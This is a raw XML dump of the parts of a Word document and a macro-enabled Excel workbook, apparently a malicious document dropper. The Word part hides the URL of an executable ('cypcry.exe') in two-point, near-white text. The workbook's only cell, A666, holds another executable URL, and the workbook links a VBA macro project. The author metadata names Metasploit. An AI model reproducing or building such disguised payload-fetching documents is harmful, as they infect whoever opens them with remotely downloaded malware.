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xl/workbook.xml" ContentType="application/vnd.ms-excel.sheet.macroEnabled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03" w:rsidRPr="00357D88" w:rsidRDefault="00F96B03">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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3D4E4C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style"/>
          <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style"/>
          <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
        <w:t>https://a.pomf.cat/cypcry.exe\</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D85293" w:rsidRPr="00357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DE"/>
    <w:rsid w:val="00007E3D"/>
    <w:rsid w:val="00055732"/>
    <w:rsid w:val="000569C1"/>
    <w:rsid w:val="000B1EAF"/>
    <w:rsid w:val="00102CE9"/>
    <w:rsid w:val="001064CE"/>
    <w:rsid w:val="001758CA"/>
    <w:rsid w:val="001859D7"/>
    <w:rsid w:val="00213094"/>
    <w:rsid w:val="002A689B"/>
    <w:rsid w:val="00322C80"/>
    <w:rsid w:val="00355CEF"/>
    <w:rsid w:val="00357D88"/>
    <w:rsid w:val="003C14A3"/>
    <w:rsid w:val="003D4175"/>
    <w:rsid w:val="003D4E4C"/>
    <w:rsid w:val="00400433"/>
    <w:rsid w:val="00401AA9"/>
    <w:rsid w:val="004125C7"/>
    <w:rsid w:val="00423581"/>
    <w:rsid w:val="004C1586"/>
    <w:rsid w:val="004C5421"/>
    <w:rsid w:val="005411F3"/>
    <w:rsid w:val="005A4499"/>
    <w:rsid w:val="00610ECB"/>
    <w:rsid w:val="006117C5"/>
    <w:rsid w:val="00617DDC"/>
    <w:rsid w:val="006D6EB6"/>
    <w:rsid w:val="006E0CC5"/>
    <w:rsid w:val="007C2BCD"/>
    <w:rsid w:val="00864FBB"/>
    <w:rsid w:val="008742AD"/>
    <w:rsid w:val="00874B96"/>
    <w:rsid w:val="00877FF0"/>
    <w:rsid w:val="00895367"/>
    <w:rsid w:val="009210E2"/>
    <w:rsid w:val="00973140"/>
    <w:rsid w:val="00981292"/>
    <w:rsid w:val="00A01528"/>
    <w:rsid w:val="00A66539"/>
    <w:rsid w:val="00AB08DE"/>
    <w:rsid w:val="00AF3821"/>
    <w:rsid w:val="00BB3BFC"/>
    <w:rsid w:val="00BC6BA3"/>
    <w:rsid w:val="00C055C8"/>
    <w:rsid w:val="00C545B6"/>
    <w:rsid w:val="00CA154B"/>
    <w:rsid w:val="00CB1B6E"/>
    <w:rsid w:val="00CC2C0D"/>
    <w:rsid w:val="00D23FBB"/>
    <w:rsid w:val="00D45AF6"/>
    <w:rsid w:val="00D85293"/>
    <w:rsid w:val="00E5454C"/>
    <w:rsid w:val="00E6267D"/>
    <w:rsid w:val="00E64850"/>
    <w:rsid w:val="00ED25FE"/>
    <w:rsid w:val="00F571DA"/>
    <w:rsid w:val="00F84440"/>
    <w:rsid w:val="00F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3</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="3" baseType="lpstr">
      <vt:lpstr>Sheet1</vt:lpstr>
      <vt:lpstr>Sheet2</vt:lpstr>
      <vt:lpstr>Sheet3</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <LinksUpToDate>false</LinksUpToDate>
  <SharedDoc>false</SharedDoc>
  <HyperlinksChanged>false</HyperlinksChanged>
  <AppVersion>14.0300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Metasploit</dc:creator>
  <cp:lastModifiedBy>Metasploit</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-11-05T15:04:39Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-11-10T09:00:01Z</dcterms:modified>
</cp:coreProperties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worksheet" Target="worksheets/sheet3.xml"/><Relationship Id="rId7" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin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sharedStrings" Target="sharedStrings.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/></Relationships>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
  <si>
    <t>https://a.pomf.cat/jpjacv.exe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1" x14ac:knownFonts="1">
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="238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</extLst>
</styleSheet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book.xml><?xml version="1.0" encoding="utf-8"?>
<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <fileVersion appName="xl" lastEdited="5" lowestEdited="5" rupBuild="9302" codeName="{8C4F1C90-05EB-6A55-5F09-09C24B55AC0B}"/>
  <workbookPr codeName="ThisWorkbook" defaultThemeVersion="124226"/>
  <bookViews>
    <workbookView xWindow="240" yWindow="60" windowWidth="20115" windowHeight="8010"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
    <sheet name="Sheet2" sheetId="2" r:id="rId2"/>
    <sheet name="Sheet3" sheetId="3" r:id="rId3"/>
  </sheets>
  <functionGroups builtInGroupCount="17"/>
  <calcPr calcId="144525"/>
</workbook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1"/>
  <dimension ref="A666"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="666" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A666" t="s">
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"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2"/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

<file path=xl/worksheets/sheet3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3"/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